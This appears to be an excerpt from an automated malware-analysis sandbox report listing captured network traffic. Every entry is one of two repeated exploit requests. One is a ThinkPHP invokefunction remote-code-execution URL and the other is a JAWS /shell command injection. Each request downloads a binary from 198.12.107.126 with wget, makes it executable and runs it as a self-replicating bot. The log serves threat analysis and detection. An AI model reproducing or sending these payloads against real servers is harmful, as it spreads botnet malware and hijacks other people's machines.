      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
